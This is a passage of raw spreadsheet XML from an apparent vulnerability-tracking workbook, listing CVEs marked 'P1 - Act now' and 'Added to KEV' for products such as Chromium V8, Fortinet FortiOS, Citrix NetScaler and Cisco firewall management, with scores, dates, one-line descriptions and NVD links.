/><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1492" r:id="rId1491" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1493" r:id="rId1492" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1494" r:id="rId1493" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1495" r:id="rId1494" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1496" r:id="rId1495" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1497" r:id="rId1496" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1498" r:id="rId1497" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1499" r:id="rId1498" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1500" r:id="rId1499" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1501" r:id="rId1500" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1502" r:id="rId1501" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1503" r:id="rId1502" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1504" r:id="rId1503" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1505" r:id="rId1504" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1506" r:id="rId1505" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1507" r:id="rId1506" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1508" r:id="rId1507" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1509" r:id="rId1508" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1510" r:id="rId1509" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1511" r:id="rId1510" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1512" r:id="rId1511" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1513" r:id="rId1512" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1514" r:id="rId1513" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1515" r:id="rId1514" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1516" r:id="rId1515" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1517" r:id="rId1516" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1518" r:id="rId1517" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1519" r:id="rId1518" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1520" r:id="rId1519" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1521" r:id="rId1520" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1522" r:id="rId1521" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1523" r:id="rId1522" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1524" r:id="rId1523" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1525" r:id="rId1524" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1526" r:id="rId1525" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1527" r:id="rId1526" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1528" r:id="rId1527" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1529" r:id="rId1528" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1530" r:id="rId1529" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1531" r:id="rId1530" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1532" r:id="rId1531" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1533" r:id="rId1532" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1534" r:id="rId1533" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1535" r:id="rId1534" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1536" r:id="rId1535" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1537" r:id="rId1536" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1538" r:id="rId1537" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1539" r:id="rId1538" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1540" r:id="rId1539" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1541" r:id="rId1540" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1542" r:id="rId1541" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1543" r:id="rId1542" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1544" r:id="rId1543" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1545" r:id="rId1544" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1546" r:id="rId1545" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1547" r:id="rId1546" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1548" r:id="rId1547" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1549" r:id="rId1548" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1550" r:id="rId1549" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1551" r:id="rId1550" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1552" r:id="rId1551" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1553" r:id="rId1552" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1554" r:id="rId1553" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1555" r:id="rId1554" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1556" r:id="rId1555" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1557" r:id="rId1556" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1558" r:id="rId1557" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1559" r:id="rId1558" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1560" r:id="rId1559" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1561" r:id="rId1560" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1562" r:id="rId1561" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1563" r:id="rId1562" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1564" r:id="rId1563" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1565" r:id="rId1564" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1566" r:id="rId1565" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1567" r:id="rId1566" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1568" r:id="rId1567" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1569" r:id="rId1568" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1570" r:id="rId1569" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1571" r:id="rId1570" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1572" r:id="rId1571" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1573" r:id="rId1572" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1574" r:id="rId1573" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1575" r:id="rId1574" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1576" r:id="rId1575" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1577" r:id="rId1576" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1578" r:id="rId1577" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1579" r:id="rId1578" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1580" r:id="rId1579" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1581" r:id="rId1580" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1582" r:id="rId1581" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1583" r:id="rId1582" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1584" r:id="rId1583" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1585" r:id="rId1584" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1586" r:id="rId1585" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1587" r:id="rId1586" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1588" r:id="rId1587" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1589" r:id="rId1588" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1590" r:id="rId1589" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1591" r:id="rId1590" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1592" r:id="rId1591" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1593" r:id="rId1592" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1594" r:id="rId1593" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1595" r:id="rId1594" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1596" r:id="rId1595" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1597" r:id="rId1596" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1598" r:id="rId1597" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1599" r:id="rId1598" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1600" r:id="rId1599" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1601" r:id="rId1600" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1602" r:id="rId1601" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1603" r:id="rId1602" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1604" r:id="rId1603" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1605" r:id="rId1604" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1606" r:id="rId1605" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1607" r:id="rId1606" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1608" r:id="rId1607" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1609" r:id="rId1608" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1610" r:id="rId1609" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1611" r:id="rId1610" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1612" r:id="rId1611" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1613" r:id="rId1612" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1614" r:id="rId1613" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1615" r:id="rId1614" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1616" r:id="rId1615" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1617" r:id="rId1616" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1618" r:id="rId1617" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1619" r:id="rId1618" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1620" r:id="rId1619" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1621" r:id="rId1620" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1622" r:id="rId1621" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1623" r:id="rId1622" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1624" r:id="rId1623" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1625" r:id="rId1624" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1626" r:id="rId1625" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1627" r:id="rId1626" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1628" r:id="rId1627" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1629" r:id="rId1628" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1630" r:id="rId1629" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1631" r:id="rId1630" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1632" r:id="rId1631" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1633" r:id="rId1632" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1634" r:id="rId1633" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1635" r:id="rId1634" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1636" r:id="rId1635" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1637" r:id="rId1636" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1638" r:id="rId1637" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1639" r:id="rId1638" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1640" r:id="rId1639" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1641" r:id="rId1640" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1642" r:id="rId1641" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1643" r:id="rId1642" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1644" r:id="rId1643" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1645" r:id="rId1644" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1646" r:id="rId1645" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1647" r:id="rId1646" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1648" r:id="rId1647" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1649" r:id="rId1648" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1650" r:id="rId1649" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1651" r:id="rId1650" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1652" r:id="rId1651" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1653" r:id="rId1652" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1654" r:id="rId1653" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1655" r:id="rId1654" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1656" r:id="rId1655" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1657" r:id="rId1656" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1658" r:id="rId1657" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1659" r:id="rId1658" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1660" r:id="rId1659" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1661" r:id="rId1660" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1662" r:id="rId1661" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1663" r:id="rId1662" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1664" r:id="rId1663" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1665" r:id="rId1664" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1666" r:id="rId1665" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1667" r:id="rId1666" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1668" r:id="rId1667" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1669" r:id="rId1668" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1670" r:id="rId1669" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1671" r:id="rId1670" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1672" r:id="rId1671" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1673" r:id="rId1672" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1674" r:id="rId1673" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1675" r:id="rId1674" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1676" r:id="rId1675" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1677" r:id="rId1676" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1678" r:id="rId1677" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1679" r:id="rId1678" /></hyperlinks><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CVE-2026-87491</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I3" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>google:chromium v8</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr"/>
      <c r="P3" s="5" t="inlineStr"/>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>2026-09-23</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr"/>
      <c r="S3"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3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87491</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-25249</t>
        </is>
      </c>
      <c r="D4" s="5" t="inlineStr"/>
      <c r="E4" s="5" t="inlineStr"/>
      <c r="F4" s="5" t="inlineStr"/>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.024</v>
      </c>
      <c r="I4" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>fortinet:multiple products</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr"/>
      <c r="P4" s="5" t="inlineStr"/>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr"/>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Fortinet FortiOS, FortiSwitchManager, and FortiSASE contain a heap-based buffer overflow vulnerability that allows an attacker to execute unauthorized code or commands via specially crafted packets.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-25249</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19490</t>
        </is>
      </c>
      <c r="D5" s="5" t="inlineStr"/>
      <c r="E5" s="5" t="inlineStr"/>
      <c r="F5" s="5" t="inlineStr"/>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H5" s="5" t="n">
        <v>0.056</v>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler</t>
        </is>
      </c>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr"/>
      <c r="P5" s="5" t="inlineStr"/>
      <c r="Q5" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S5"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5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19490</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20079</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr"/>
      <c r="E6" s="5" t="inlineStr"/>
      <c r="F6" s="5" t="inlineStr"/>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H6" s="5" t="n">
        <v>0.758</v>
      </c>
      <c r="I6" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>cisco:secure firewall management center (fmc) and security cloud control (scc) firewall management</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr"/>
      <c r="P6" s="5" t="inlineStr"/>
      <c r="Q6" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R6" s="5" t="inlineStr"/>
      <c r="S6"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6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42016</t>
        </is>
      </c>
      <c r="D7" s="5" t="inlineStr"/>
      <c r="E7" s="5" t="inlineStr"/>
      <c r="F7" s="5" t="inlineStr"/>
      <c r="G7" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H7" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I7" s="5" t="inlineStr">
        <is>
          <t>active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incorrect authorization vulnerability that leads to a privilege escalation attack due to a validation check of the token signature/issuer and not the token’s scope.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42016</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42018</t>
        </is>
      </c>
      <c r="D8" s="5" t="inlineStr"/>
      <c r="E8" s="5" t="inlineStr"/>
      <c r="F8" s="5" t="inlineStr"/>
      <c r="G8" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H8" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I8" s="5" t="inlineStr">
        <is>
          <t>none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improper authentication vulnerability that could return an internal anonymous-user token to an unauthenticated caller when anonymous access is disabled, potentially exposing sensitive resources.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42018</t>
        </is>
      </c>
    </row>
    <row r="9">
